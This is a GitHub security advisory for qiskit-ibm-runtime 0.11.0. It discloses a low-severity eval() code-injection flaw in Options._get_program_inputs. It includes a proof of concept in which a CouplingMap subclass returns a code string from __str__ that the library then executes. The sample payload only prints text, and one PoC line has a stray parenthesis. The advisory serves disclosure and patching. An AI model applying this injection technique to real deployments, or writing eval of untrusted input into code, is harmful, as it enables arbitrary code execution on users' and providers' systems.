GHSA-cq96-9974-v8hm – qiskit-ibm-runtime

Package

Manager: pip
Name: qiskit-ibm-runtime
Vulnerable Version: >=0.11.0 <0.11.1

Severity

Level: Low

CVSS v3.1: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N

CVSS v4.0: CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

EPSS: N/A pctlN/A

Details

Dynamic Variable Evaluation in qiskit-ibm-runtime ### Summary An `eval()` method exists `Options._get_program_inputs`. This is bad in any case, but especially bad because `Options` are also used server side, so this has the potential to expose arbitrary code injection in runtime containers, now or at a later time. ### Details https://github.com/Qiskit/qiskit-ibm-runtime/blob/da94a42060f1a22e6f306227deb45b70e0075723/qiskit_ibm_runtime/options/options.py#L140 ### PoC A local exploit would be something like ```python from qiskit import transpiler class BadActor(transpiler.CouplingMap): def __str__(self): return "print('external code')" ``` Where `print("external code")` can be any arbitrary python code string. Then if you did a normal workflow and used a specifically constructed `CouplingMap` subclass like `BadActor` above: ```python from qiskit_ibm_runtime import QiskitRuntimeService, Session, Options, Sampler from qiskit import QuantumCircuit cmap = BadActor.from_line(42) service = QiskitRuntimeService() options = Options(optimization_level=1) options.simulator = dict(coupling_map=cmap)) bell = QuantumCircuit(2) bell.h(0) bell.cx(0, 1) bell.measure_all() with Session(service=service, backend="ibmq_qasm_simulator") as session: sampler = Sampler(session=session, options=options).run(bell) ``` This will print `external code` ### Impact Security vulnerability.

Metadata

Created: 2024-03-20T15:41:26Z
Modified: 2024-03-20T15:41:27Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-cq96-9974-v8hm/GHSA-cq96-9974-v8hm.json
CWE IDs: ["CWE-627"]
Alternative ID: N/A
Finding: F020
Auto approve: 1